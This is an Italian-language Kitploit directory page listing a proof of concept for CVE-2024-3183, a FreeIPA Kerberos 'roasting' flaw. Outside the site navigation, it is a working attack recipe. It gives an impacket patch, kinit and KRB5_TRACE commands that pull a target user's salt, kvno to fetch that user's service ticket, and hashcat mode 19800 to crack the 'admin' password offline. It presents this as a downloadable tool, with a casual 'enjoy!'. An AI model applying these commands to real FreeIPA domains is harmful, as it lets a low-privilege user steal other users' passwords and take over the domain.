Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/im10n/cve-2024-3183-poc
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitPenetration TestingAutenticazione
GitHubim10n/cve-2024-3183-poc

CVE-2024-3183-POC

PoC per CVE-2024-3183 (FreeIPA Rosting)

Vedi Repository
29242 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-3183-POC

POC per CVE-2024-3183 (FreeIPA Rosting)

Impatto: Un utente con privilegi bassi può ottenere un hash delle password di tutti gli utenti del dominio ed eseguire un brute force offline (kerberoasting).

Patch per impacket-getTGT:

  1. Aggiungi decoder.decode.defaultErrorState = stGetValueDecoderByTag a impacket/krb5/kerberosv5.py.
  2. Divertiti!

POC1:

  1. Aggiungi decoder.decode.defaultErrorState = stGetValueDecoderByTag a impacket/krb5/kerberosv5.py.
  2. Puoi usare impacket-getTGT con le opzioni -service e -debug per ottenere il salt in un unico comando. impacket-getTGT test.local/user -debug -service admin

POC2:

  1. Per prima cosa, richiediamo un ticket TGT per un utente già compromesso "admin". kinit user foto1
  2. In secondo luogo, scopriremo il salt dell'utente "admin": printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt foto2
  3. Ottieni TGS per "admin": kvno admin foto foto3
  4. Usa lo script python (o hashcat mod 19800 con salt specifico) per il brute force del TGS foto4

1 - TGS, 2 - SALT, 3 - Password.

  1. Congratulazioni, ora abbiamo la password dell'utente “admin”.

POC3:

  1. Puoi usare kinit per un'unica mossa: kinit -S target user

e ottieni un TGT cifrato con la chiave dell'utente target.

Scarica lo strumento